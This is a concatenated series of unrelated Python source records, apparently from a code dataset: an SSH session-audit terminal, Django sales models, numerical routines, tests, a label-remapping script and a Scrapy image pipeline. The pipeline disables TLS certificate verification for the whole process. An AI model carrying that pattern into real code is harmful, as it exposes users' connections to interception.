2, 5, 1)\n \n\n\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n teachJourn = MainWindow()\n teachJourn.show()\n sys.exit(app.exec_())\n \n","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500882340","text":"# 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。 \n# \n# 你可以假设每种输入只会对应一个答案。但是,你不能重复利用这个数组中同样的元素。 \n# \n# 示例: \n# \n# 给定 nums = [2, 7, 11, 15], target = 9\n# \n# 因为 nums[0] + nums[1] = 2 + 7 = 9\n# 所以返回 [0, 1]\n# \n# Related Topics 数组 哈希表\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def twoSum(self, nums, target):\n if not nums or len(nums) <= 1:\n return None\n res = {target - nums[0]: 0}\n # O(n)\n for i in range(1, len(nums)):\n if nums[i] in res:\n return [res[nums[i]], i]\n else:\n res[target - nums[i]] = i\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nres = Solution().twoSum([2, 7, 11, 15], 26)\nprint(res)\n\n","sub_path":"Week_01/[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645817781","text":"# -*- coding: utf-8 -*-\nfrom .models import SshLog\nfrom omsbackend import settings\nimport os\nimport socket\nimport sys\nfrom paramiko.py3compat import u\ntry:\n import termios\n import tty\n has_termios = True\nexcept ImportError:\n has_termios = False\n raise Exception('This pro does\\'t support windows')\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as e:\n import errno\n if e.errno == errno.EEXIST:\n pass\n\n\n\ndef interactive_shell(chan,channel,log_name=None,width=90,height=40):\n if has_termios:\n posix_shell(chan,channel,log_name=log_name,width=width,height=height)\n else:\n exit(1)\ndef posix_shell(chan,channel,log_name=None,width=90,height=40):\n from omsbackend.asgi import channel_layer\n import time\n import json\n stdout = list()\n begin_time = time.time()\n last_write_time = {'last_activity_time': begin_time}\n import select\n #oldtty = termios.tcgetattr(sys.stdin)\n try:\n tty.setraw(sys.stdin.fileno())\n tty.setcbreak(sys.stdin.fileno())\n chan.settimeout(0.0)\n while True:\n r,w,e = select.select([chan,sys.stdin],[],[])\n if chan in r:\n try:\n x = u(chan.recv(1024))\n if len(x) ==0:\n channel_layer.group_send(channel,{'text':json.dumps(['disconnect','\\r\\n*** EOF\\r\\n'])})\n break\n if x==\"exit\\r\\n\" or x==\"logout\\r\\n\":\n chan.close()\n except socket.timeout:\n pass\n if sys.stdin in r:\n now = time.time()\n delay = now - last_write_time['last_activity_time']\n last_write_time['last_activity_time'] = now\n x = sys.stdin.read(1)\n if len(x) ==0:\n break\n #chan.send(x)\n stdout.append([delay,x])\n channel_layer.group_send(channel,{'text':json.dumps(['stdout',x])})\n if log_name:\n channel_layer.group_send(u'monitor-{0}'.format(log_name.rsplit('/')[1].rsplit('.json')[0]), {'text': json.dumps(['stdout',x])})\n finally:\n #termios.tcsetattr(sys.stdin,termios.TCSADRAIN,oldtty)\n attrs = {\n \"version\": 1,\n \"width\": width,\n \"height\": height,\n \"duration\": round(time.time() - begin_time, 6),\n \"command\": os.environ.get('SHELL', None),\n 'title': None,\n \"env\": {\n \"TERM\": os.environ.get('TERM'),\n \"SHELL\": os.environ.get('SHELL', 'sh')\n },\n 'stdout': list(map(lambda frame: [round(frame[0], 6), frame[1]], stdout))\n }\n mkdir_p('/'.join(os.path.join(settings.MEDIA_ROOT, log_name).rsplit('/')[0:-1]))\n with open(os.path.join(settings.MEDIA_ROOT, log_name), \"a\") as f:\n f.write(json.dumps(attrs, ensure_ascii=True, indent=2))\n audit_log = SshLog.objects.get(channel=channel, log=log_name.rsplit('/')[-1].rsplit('.json')[0])\n audit_log.is_finished = True\n from django.utils import timezone\n audit_log.end_time = timezone.now()\n audit_log.save()\n # hand ssh terminal exit\n queue = channel_layer._connection_list[0]\n redis_channel = queue.pubsub()\n queue.publish(channel, json.dumps(['close']))\n","sub_path":"apps/webterminal/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48178418","text":"#!python\n# -*- coding: utf-8 -*-#\n###########################################################################\n# Author : Bhishan Poudel; Physics Graduate Student, Ohio University\n# Date : Sep 13, 2017 Wed\n# Last update :\n###########################################################################\n\"\"\"\n:Topic: Linear Regression Using Gradient Descent\n\n:Runtime:\n\n\"\"\"\n# Imports\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\n\ndef lin_regr1():\n n = 50\n x = np.random.randn(n)\n y = x * np.random.randn(n)\n\n fig, ax = plt.subplots()\n fit = np.polyfit(x, y, deg=1)\n ax.plot(x, fit[0] * x + fit[1], color='red')\n ax.scatter(x, y)\n\n plt.show()\n\ndef lin_regr2():\n # sample data\n x = np.arange(10)\n y = 5*x + 10\n\n # fit with np.polyfit\n m, b = np.polyfit(x, y, 1)\n\n plt.plot(x, y, '.')\n plt.plot(x, m*x + b, '-')\n plt.show()\n\ndef lin_regr3():\n X = np.random.rand(100)\n Y = X + np.random.rand(100)*0.1\n\n results = sm.OLS(Y,sm.add_constant(X)).fit()\n\n # print (results.summary())\n print(\"results.params = \", results.params)\n w = results.params\n\n plt.scatter(X,Y)\n\n X_plot = np.linspace(0,1,100)\n plt.plot(X_plot, X_plot*w[1] + w[0])\n\n plt.show()\n\ndef lin_regr4():\n x = np.random.rand(100)\n y = x + np.random.rand(100)*0.1\n plt.scatter(x,y)\n plt.plot(x, np.poly1d(np.polyfit(x, y, 1))(x))\n plt.show()\n\n\nif __name__ == \"__main__\":\n lin_regr3()\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw01/lin_reg_try/lin_reg_plot.py","file_name":"lin_reg_plot.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"351597352","text":"import numpy as np\nfrom scipy.linalg import solve\nfrom scipy.sparse import eye, csr_matrix\n\nfrom sklearn.utils import check_array\nfrom sklearn.utils.validation import FLOAT_DTYPES\nfrom sklearn.neighbors import NearestNeighbors\n\n\ndef barycenter_weights(X, Z, reg=1e-3):\n \"\"\"Compute barycenter weights of X from Y along the first axis\n\n We estimate the weights to assign to each point in Y[i] to recover\n the point X[i]. The barycenter weights sum to 1.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_dim)\n\n Z : array-like, shape (n_samples, n_neighbors, n_dim)\n\n reg : float, optional\n amount of regularization to add for the problem to be\n well-posed in the case of n_neighbors > n_dim\n\n Returns\n -------\n B : array-like, shape (n_samples, n_neighbors)\n\n Notes\n -----\n See developers note for more information.\n \"\"\"\n X = check_array(X, dtype=FLOAT_DTYPES)\n Z = check_array(Z, dtype=FLOAT_DTYPES, allow_nd=True)\n n_samples, n_neighbors = X.shape[0], Z.shape[1]\n B = np.empty((n_samples, n_neighbors), dtype=X.dtype)\n v = np.ones(n_neighbors, dtype=X.dtype)\n\n # this might raise a LinalgError if G is singular and has trace\n # zero\n for i, A in enumerate(Z.transpose(0, 2, 1)):\n C = A.T - X[i] # broadcasting\n G = np.dot(C, C.T)\n trace = np.trace(G)\n if trace > 0:\n R = reg * trace\n else:\n R = reg\n G.flat[::Z.shape[1] + 1] += R\n w = solve(G, v, sym_pos=True)\n B[i, :] = w / np.sum(w)\n return B\n\n\ndef barycenter_kneighbors_graph(X, n_neighbors, reg=1e-3, n_jobs=None):\n \"\"\"Computes the barycenter weighted graph of k-Neighbors for points in X\n\n Parameters\n ----------\n X : {array-like, NearestNeighbors}\n Sample data, shape = (n_samples, n_features), in the form of a\n numpy array or a NearestNeighbors object.\n\n n_neighbors : int\n Number of neighbors for each sample.\n\n reg : float, optional\n Amount of regularization when solving the least-squares\n problem. Only relevant if mode='barycenter'. If None, use the\n default.\n\n n_jobs : int or None, optional (default=None)\n The number of parallel jobs to run for neighbors search.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n Returns\n -------\n A : sparse matrix in CSR format, shape = [n_samples, n_samples]\n A[i, j] is assigned the weight of edge that connects i to j.\n\n See also\n --------\n sklearn.neighbors.kneighbors_graph\n sklearn.neighbors.radius_neighbors_graph\n \"\"\"\n knn = NearestNeighbors(n_neighbors + 1, n_jobs=n_jobs).fit(X)\n X = knn._fit_X\n n_samples = X.shape[0]\n ind = knn.kneighbors(X, return_distance=False)[:, 1:]\n data = barycenter_weights(X, X[ind], reg=reg)\n indptr = np.arange(0, n_samples * n_neighbors + 1, n_neighbors)\n return csr_matrix((data.ravel(), ind.ravel(), indptr),\n shape=(n_samples, n_samples))\n\n\ndef locally_linear_embedding(\n X, n_neighbors, reg=1e-3, eigen_solver='auto', n_jobs=None):\n \"\"\"Perform a Locally Linear Embedding analysis on the data.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n X : {array-like, NearestNeighbors}\n Sample data, shape = (n_samples, n_features), in the form of a\n numpy array or a NearestNeighbors object.\n\n n_neighbors : integer\n number of neighbors to consider for each point.\n\n reg : float\n regularization constant, multiplies the trace of the local covariance\n matrix of the distances.\n\n eigen_solver : string, {'auto', 'arpack', 'dense'}\n auto : algorithm will attempt to choose the best method for input data\n\n arpack : use arnoldi iteration in shift-invert mode.\n For this method, M may be a dense matrix, sparse matrix,\n or general linear operator.\n Warning: ARPACK can be unstable for some problems. It is\n best to try several random seeds in order to check results.\n\n dense : use standard dense matrix operations for the eigenvalue\n decomposition. For this method, M must be an array\n or matrix type. This method should be avoided for\n large problems.\n\n n_jobs : int or None, optional (default=None)\n The number of parallel jobs to run for neighbors search.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n Returns\n -------\n Y : array-like, shape [n_samples, n_components]\n Embedding vectors.\n\n squared_error : float\n Reconstruction error for the embedding vectors. Equivalent to\n ``norm(Y - W Y, 'fro')**2``, where W are the reconstruction weights.\n\n References\n ----------\n\n .. [1] `Roweis, S. & Saul, L. Nonlinear dimensionality reduction\n by locally linear embedding. Science 290:2323 (2000).`\n .. [2] `Donoho, D. & Grimes, C. Hessian eigenmaps: Locally\n linear embedding techniques for high-dimensional data.\n Proc Natl Acad Sci U S A. 100:5591 (2003).`\n .. [3] `Zhang, Z. & Wang, J. MLLE: Modified Locally Linear\n Embedding Using Multiple Weights.`\n http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.70.382\n .. [4] `Zhang, Z. & Zha, H. Principal manifolds and nonlinear\n dimensionality reduction via tangent space alignment.\n Journal of Shanghai Univ. 8:406 (2004)`\n \"\"\"\n if eigen_solver not in ('auto', 'arpack', 'dense'):\n raise ValueError(\"unrecognized eigen_solver '%s'\" % eigen_solver)\n\n nbrs = NearestNeighbors(n_neighbors=n_neighbors + 1, n_jobs=n_jobs)\n nbrs.fit(X)\n X = nbrs._fit_X\n\n N, d_in = X.shape\n\n if n_neighbors >= N:\n raise ValueError(\n \"Expected n_neighbors <= n_samples, \"\n \" but n_samples = %d, n_neighbors = %d\" %\n (N, n_neighbors)\n )\n\n if n_neighbors <= 0:\n raise ValueError(\"n_neighbors must be positive\")\n\n M_sparse = (eigen_solver != 'dense')\n\n W = barycenter_kneighbors_graph(\n nbrs, n_neighbors=n_neighbors, reg=reg, n_jobs=n_jobs)\n # we'll compute M = (I-W)'(I-W)\n # depending on the solver, we'll do this differently\n if M_sparse:\n M = eye(*W.shape, format=W.format) - W\n # M = (M.T * M).tocsr()\n M = (M.T * M)\n else:\n M = (W.T * W - W.T - W).toarray()\n M.flat[::M.shape[0] + 1] += 1 # W = W - I = W - I\n\n return M\n\n","sub_path":"src/cdcpd/lle.py","file_name":"lle.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267957415","text":"import numpy as np\nimport pandas as pd\nimport pytest\nimport xarray as xr\n\nfrom xclim import indices as xci\n\n\nclass TestBaseFlowIndex:\n def test_simple(self, q_series):\n a = np.zeros(365) + 10\n a[10:17] = 1\n q = q_series(a)\n out = xci.base_flow_index(q)\n np.testing.assert_array_equal(out, 1.0 / a.mean())\n\n\nclass TestRBIndex:\n def test_simple(self, q_series):\n a = np.zeros(365)\n a[10] = 10\n q = q_series(a)\n out = xci.rb_flashiness_index(q)\n np.testing.assert_array_equal(out, 2)\n","sub_path":"xclim/testing/tests/test_hydrology.py","file_name":"test_hydrology.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621812772","text":"from datetime import date, datetime\n\nfrom django.db import models, IntegrityError\n\nfrom api_apps.common.models import TimeStamped, Address\nfrom api_apps.products.models import Offer\n\nfrom utils.brain_tree import transaction\nfrom utils.sirius import rate_sales_order\n\n\nclass Cart(TimeStamped):\n\n customer = models.ForeignKey('customers.Customer', related_name='carts')\n has_been_purchased = models.BooleanField(default=False)\n \"\"\"\n Related Names:\n .sales_order = [sales.SalesOrder]\n .offers = [sales.CartedOffer]\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Cart, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s [%s]\" % (str(self.customer), str(self.pk))\n\n @property\n def subtotal(self):\n return sum([o.line_total for o in self.offers.all()])\n\n\nclass SalesOrder(TimeStamped):\n\n # created from\n cart = models.OneToOneField(Cart, related_name='sales_order')\n # braintree stuff\n braintree_transaction_id = models.CharField(max_length=255)\n last_4 = models.CharField(max_length=255)\n amount = models.FloatField()\n card_type = models.CharField(max_length=255)\n # shipping stuff\n shipping_address = models.ForeignKey(Address)\n # was this from a subscription?\n subscription = models.ForeignKey('sales.Subscription', blank=True, null=True, default=None)\n # processing flags\n has_been_voided = models.BooleanField(default=False) # braintree manual void\n has_been_refunded = models.BooleanField(default=False) # braintree refund\n needs_to_be_reshipped = models.BooleanField(default=False) # flag for reship\n has_been_reshipped = models.BooleanField(default=False) # set to True after reshipping\n has_been_exported = models.BooleanField(default=False)\n \"\"\"\n Related Names:\n .parcels -> [shipping.Parcel]\n \"\"\"\n\n class Meta:\n verbose_name = 'Sales Order'\n\n def __init__(self, *args, **kwargs):\n super(SalesOrder, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return str(self.cart)\n\n def save(self, *args, **kwargs):\n super(SalesOrder, self).save(*args, **kwargs)\n self.cart.customer.last_purchase_date = datetime.now()\n if self.cart.customer.first_purchase_date is None:\n self.cart.customer.first_purchase_date = datetime.now()\n self.cart.customer.save()\n self.cart.has_been_purchased = True\n self.cart.save()\n try:\n _ = self.cart.customer.current_cart\n except Exception as e:\n print(str(e))\n pass\n\n @property\n def total(self):\n return self.cart.subtotal\n\n def void(self):\n \"\"\"voids an unsettled transaction in braintree\n \"\"\"\n transaction.void_sales_order(self)\n self.has_been_voided = True\n self.save()\n if self.has_been_exported:\n raise Exception(\n 'Void successful, but has already been exported to warehouse. Please contact them immediately!'\n )\n else:\n return self\n\n def refund(self):\n \"\"\"refunds a settled transaction in braintree\n \"\"\"\n try:\n transaction.void_sales_order(self)\n self.has_been_voided = True\n self.save()\n except Exception: # traps errors on void\n pass\n transaction.refund_sales_order(self)\n self.has_been_refunded = True\n self.save()\n return self\n\n def make_parcels(self):\n from api_apps.shipping.models import Parcel, SentProduct\n offers, rate, service = rate_sales_order(self)\n parcel = Parcel(sales_order=self, shipping_service=service, rate=rate)\n parcel.save()\n for offer, count in offers.items():\n offer = Offer.objects.get(id=offer)\n for op in offer.products.all():\n sent_product = SentProduct(parcel=parcel, product=op.product, quantity=op.products_per*count)\n sent_product.save()\n return parcel\n\n def get_sku_ids(self):\n return [\n offered_product.product.sku.id\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_sku_names(self):\n return [\n offered_product.product.sku.name\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_brand_names(self):\n return list(set([\n offered_product.product.sku.brand.name\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]))\n\n def get_product_ids(self):\n return [\n offered_product.product.id\n for carted_offer in self.cart.offers.all()\n for offered_product in carted_offer.offer.products.all()\n ]\n\n def get_offer_ids(self):\n return [\n carted_offer.offer.id\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_offer_names(self):\n return [\n carted_offer.offer.name\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_ids(self):\n return [\n carted_offer.deal.id\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_titles(self):\n return [\n carted_offer.deal.title\n for carted_offer in self.cart.offers.all()\n ]\n\n def get_deal_groups(self):\n return list(set([\n group.name\n for carted_offer in self.cart.offers.all()\n for group in carted_offer.deal.groups.all()\n ]))\n\n def get_deal_tags(self):\n return list(set([\n tag.internal\n for carted_offer in self.cart.offers.all()\n for tag in carted_offer.deal.tags.all()\n ]))\n\n\nclass Subscription(TimeStamped):\n\n TOTM_DAY = 10\n TROTM_DAY = 14\n CHOTM_DAY = 7\n\n customer = models.ForeignKey('customers.Customer', related_name='subscriptions')\n offer = models.ForeignKey('products.Offer', related_name='subscriptions')\n deal = models.ForeignKey('products.Deal')\n quantity = models.PositiveIntegerField()\n starts_on = models.DateField()\n ends_on = models.DateField(blank=True, null=True, default=None)\n last_process_date = models.DateField(blank=True, null=True, default=None)\n is_paused = models.BooleanField(default=False)\n is_totm = models.BooleanField(default=False) # toy of the month\n is_trotm = models.BooleanField(default=False) # treat of the month\n is_chotm = models.BooleanField(default=False) # chew of the month\n send_every_n_days = models.PositiveIntegerField(blank=True, null=True, default=None)\n send_on_x_day = models.PositiveIntegerField(blank=True, null=True, default=None)\n strikes = models.IntegerField(default=0)\n\n class Meta:\n unique_together = (\n (\n 'customer', 'offer'\n ),\n )\n\n def __init__(self, *args, **kwargs):\n super(Subscription, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s : %s\" % (str(self.customer), str(self.offer))\n\n @property\n def should_be_processed_today(self):\n if self.is_paused:\n return False\n today = date.today()\n try:\n if self.last_process_date < today:\n if self.ends_on:\n if self.ends_on < today:\n return False\n if self.send_every_n_days:\n diff = today - self.last_process_date\n return diff.days >= self.send_every_n_days\n if self.send_on_x_day and self.last_process_date != today:\n return today.day == self.send_on_x_day\n if self.is_totm and today.day == self.TOTM_DAY and self.last_process_date != today:\n return True\n if self.is_trotm and today.day == self.TROTM_DAY and self.last_process_date != today:\n return True\n if self.is_chotm and today.day == self.CHOTM_DAY and self.last_process_date != today:\n return True\n except TypeError: # last process date is None\n return True\n return False\n\n def create_cart(self):\n cart = Cart(customer=self.customer)\n cart.save()\n offer = CartedOffer(cart=cart, offer=self.offer, quantity=self.quantity)\n offer.save()\n return cart, offer\n\n\nclass CartedOffer(TimeStamped):\n\n cart = models.ForeignKey(Cart, related_name='offers')\n offer = models.ForeignKey('products.Offer', related_name='carts')\n deal = models.ForeignKey('products.Deal')\n deal_availability = models.IntegerField(blank=True)\n offer_availability = models.IntegerField(blank=True)\n quantity = models.PositiveIntegerField()\n\n class Meta:\n verbose_name = 'Carted Offer'\n unique_together = (\n ('cart', 'offer'),\n )\n\n def __init__(self, *args, **kwargs):\n super(CartedOffer, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"%s : %s\" % (str(self.cart), str(self.offer))\n\n def save(self, *args, **kwargs):\n self.deal_availability = self.deal.available_for_sale\n self.offer_availability = self.offer.available_for_sale\n try:\n old = CartedOffer.objects.get(pk=self.pk)\n self._diff = self.quantity - old.quantity\n except (CartedOffer.DoesNotExist, AttributeError):\n self._diff = self.quantity\n try:\n super(CartedOffer, self).save(*args, **kwargs)\n except IntegrityError:\n co = CartedOffer.objects.get(cart=self.cart, offer=self.offer)\n print(co.__dict__)\n self.quantity = int(self.quantity) + int(co.quantity)\n if self.quantity < 0:\n self.quantity = 0\n self.pk = co.pk\n kwargs['force_update'] = True\n super(CartedOffer, self).save(*args, **kwargs)\n\n @property\n def line_total(self):\n return int(self.quantity) * float(self.offer.price)\n\n\n# special object wrapper for check outs\nclass Checkout(object):\n\n def __init__(self, initial=None):\n self.__dict__['_data'] = {}\n if initial:\n self.update(initial)\n\n def __getattr__(self, name):\n return self._data.get(name, None)\n\n def __setattr__(self, name, value):\n self.__dict__['_data'][name] = value\n\n def update(self, other):\n for k in other:\n self.__setattr__(k, other[k])\n\n def to_dict(self):\n return self._data\n","sub_path":"api_apps/sales/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"84837315","text":"def a(*args):\n print(args)\n print(type(args))\n\n\na(1, 2, 3, 4)\ntup1 = 1, 3, 5, 7, 9\na(*tup1)\nset1 = {1, 3, 6}\na(*set1)\nstr1 = \"hello\"\na(*str1)\na(*str1, *tup1)\ndict01 = {\"name\": 10, \"age\": 20}\na(*dict01) # 传一个拆包的字典经过*args参数之后只会把key留下变为元组\n\n\n# 经过*args参都变为元组的类型tuple\n\n\n","sub_path":"boke/元组参数02.py","file_name":"元组参数02.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570698719","text":"import json\nimport config\nimport os\nimport pprint\nfrom tqdm import tqdm\nimport cv2\npp = pprint.PrettyPrinter(indent=4)\n\njson_data = open(config.kit_help_annotation_temp).read()\nhelp_dataset = json.loads(json_data)\n\n\nmap_1 = {\n 'get cloth from technician on ladder and put on the table': 'get_from_technician_and_put_on_the_table cloth on_ladder',\n 'get cloth from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table cloth under_diverter',\n 'get spray-bottle from technician near guard-support and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle guard_support',\n 'get spray-bottle from technician on ladder and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle on_ladder',\n 'get spray-bottle from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table spray_bottle under_diverter',\n 'get torch from technician near guard-support and put on the table': 'get_from_technician_and_put_on_the_table torch guard_support',\n 'get torch from technician under diverter and put on the table': 'get_from_technician_and_put_on_the_table torch under_diverter',\n 'get spray-bottle from technician near guard and put on the table':'get_from_technician_and_put_on_the_table spray_bottle guard_support',\n 'get torch from technician on ladder and put on the table':'get_from_technician_and_put_on_the_table torch on_ladder',\n 'grasp guard and put on diverter': 'grasp_and_put_on_diverter guard at_guard_support',\n 'remove guard and put down': 'remove_and_put_down guard under_diverter'\n\n}\n\nmap_2 = {\n 'give cloth to the technician sil' : 'give_to_technician cloth sil',\n 'give cloth to the technician under_diverter' : 'give_to_technician cloth under_diverter',\n 'give spray-bottle to the technician on_ladder' : 'give_to_technician spray_bottle on_ladder',\n 'give spray-bottle to the technician sil' : 'give_to_technician spray_bottle sil',\n 'give spray-bottle to the technician under_diverter' : 'give_to_technician spray_bottle under_diverter',\n 'give torch to the technician on_ladder' : 'give_to_technician torch on_ladder',\n 'give torch to the technician sil' : 'give_to_technician torch sil',\n 'give torch to the technician under_diverter' : 'give_to_technician torch under_diverter',\n\n}\n\ndef clean_label(label):\n label = label.split(':')\n if label[0] in map_1:\n label = map_1[label[0]]\n else:\n label = label[0] + ':' + label[1]\n return label\n\ndef clean_label_2(label, dat, fl):\n label = label.split(':')\n if len(label) > 1:\n if 'under diverter' in label[1]:\n label = label[0] + ' under_diverter'\n elif 'on ladder' in label[1]:\n label = label[0] + ' on_ladder'\n elif 'at guard-support' in label[1]:\n label = label[0] + ' at_guard_support'\n else:\n pp.pprint(fl)\n # pp.pprint(dat)\n print(label)\n label = label[0] + ' sil'\n else:\n label = label[0]\n return label\n\ndef clean_label_3(label):\n if label in map_2:\n label = map_2[label]\n return label\n\nlabels = []\nlabel_collection = []\n# pp.pprint(help_dataset['recording_03-15-2019_16-14-27.267_cam6.avi'])\n\nfor fl in help_dataset:\n label_list = []\n segment_start_to_entry = {}\n # print('NEW')\n # pp.pprint(help_dataset[fl])\n\n # translation next help into previous sil help\n pp.pprint(help_dataset[fl])\n\n for idx in range(len(help_dataset[fl])-1): \n entry = help_dataset[fl][idx]\n if entry['label'].split(':')[1] == 'sil':\n if help_dataset[fl][idx+1]['label'].split(':')[0] != entry['label'].split(':')[0]:\n entry['label']=help_dataset[fl][idx+1]['label']\n\n pp.pprint(help_dataset[fl])\n\n #map start time to entry\n for idx in range(len(help_dataset[fl])): \n entry = help_dataset[fl][idx]\n segment = entry['milliseconds']\n segment_start_to_entry[segment[0]] = entry\n\n #order entry by start frame\n new_entry_order = []\n while len(segment_start_to_entry) > 0:\n min_key = min(segment_start_to_entry.keys())\n new_entry_order.append(segment_start_to_entry[min_key])\n del segment_start_to_entry[min_key]\n help_dataset[fl] = new_entry_order\n\n #cut overlapping entry by start frame\n new_entry_order_2 = []\n for idx in range(len(new_entry_order) - 1):\n entry = new_entry_order[idx]\n segment = entry['milliseconds']\n next_segment = help_dataset[fl][idx+1]['milliseconds'][0]\n if segment[1] > next_segment:\n segment[1] = next_segment- 1\n new_entry_order[idx]['milliseconds'] = segment\n new_entry_order_2.append(new_entry_order[idx])\n\n # first label clean\n for idx in range(len(help_dataset[fl])):\n entry = help_dataset[fl][idx]\n label = entry['label']\n if label.split(':')[0] not in label_collection:\n label_collection.append(label.split(':')[0])\n label = clean_label(label)\n help_dataset[fl][idx]['label'] = label\n\n # join cleaned label\n new_entry_order = []\n idx = 0\n while idx < len(help_dataset[fl]) - 1:\n entry = help_dataset[fl][idx]\n while help_dataset[fl][idx +1]['label'] == entry['label']:\n entry['milliseconds'][1] = help_dataset[fl][idx +1]['milliseconds'][1]\n del help_dataset[fl][idx +1]\n if (idx+1) > len(help_dataset[fl]) - 1:\n break\n new_entry_order.append(entry)\n idx += 1\n\n if help_dataset[fl][-1]['label'] != new_entry_order[-1]['label']:\n new_entry_order.append(help_dataset[fl][-1])\n\n help_dataset[fl] = new_entry_order\n\n # join uncleaned label\n new_entry_order = []\n idx = 0\n while idx < len(help_dataset[fl]) - 1:\n entry = help_dataset[fl][idx]\n while help_dataset[fl][idx +1]['label'].split(':')[0] == entry['label'].split(':')[0]:\n entry['label'] += (' ') + help_dataset[fl][idx +1]['label'].split(':')[1]\n entry['milliseconds'][1] = help_dataset[fl][idx +1]['milliseconds'][1]\n del help_dataset[fl][idx +1]\n if (idx+1) > len(help_dataset[fl]) - 1:\n break\n new_entry_order.append(entry)\n idx += 1\n\n if help_dataset[fl][-1]['label'] != new_entry_order[-1]['label']:\n new_entry_order.append(help_dataset[fl][-1])\n\n help_dataset[fl] = new_entry_order\n\n # search location for uncleaned label\n # and create list of all labels\n for idx in range(len(help_dataset[fl])):\n entry = help_dataset[fl][idx]\n label = entry['label']\n label = clean_label_2(label, help_dataset[fl], fl)\n label = clean_label_3(label)\n help_dataset[fl][idx]['label'] = label\n if label not in labels:\n labels.append(label)\n \nwith open(config.kit_help_annotation, 'w') as outfile:\n json.dump(help_dataset, outfile)\n\nlabel_collection.sort()\npp.pprint(label_collection)\nlabels.sort()\nprint('labels')\npp.pprint(labels)\n\n\n\n\n","sub_path":"script_help_remap.py","file_name":"script_help_remap.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452476062","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport os\nimport ssl\n\nfrom urllib import request\n\nclass NocarPipeline(object):\n def __init__(self):\n ssl._create_default_https_context = ssl._create_unverified_context\n #os.path.join(os.path.dirname(os.path.dirname(__file__)),'images')\n self.path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'dowload_images')\n if not os.path.exists(self.path):\n os.mkdir(self.path)\n else:\n print(\"已经存在文件夹\")\n\n def process_item(self, item, spider):\n catgory_title = \"bbb\"\n urls_list = item['urls_list']\n #创建一个当前分类的文件夹\n title_path = os.path.join(self.path,catgory_title)\n if not os.path.exists(title_path):\n os.mkdir(title_path)\n\n #文件夹创建完毕后,就将每一个图片放入到对应的文件夹下\n for url in urls_list:\n print(url)\n image_name = url.split(\"/\")[-1]\n request.urlretrieve(url,os.path.join(title_path,image_name))\n return item\n","sub_path":"nocar/nocar/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582646914","text":"import struct\nimport LMCPObject\nimport xml.dom.minidom\n\nimport afrl.cmasi\nimport afrl.cmasi.perceive\n\n\nHEADER_SIZE = 8 # don't modify this\nCHECKSUM_SIZE = 4 # don't modify this\nLMCP_CONTROL_STR = 0x4c4d4350\n\nclass LMCPFactory:\n def __init__(self):\n self.series_enums = {}\n from afrl.cmasi import SeriesEnum\n self.addSeries(SeriesEnum)\n from afrl.cmasi.perceive import SeriesEnum\n self.addSeries(SeriesEnum)\n\n\n def addSeries(self, series):\n if not series.SERIES_NAME_ID in self.series_enums.keys():\n self.series_enums[series.SERIES_NAME_ID] = series\n\n def getObject(self, buffer):\n if len(buffer) < 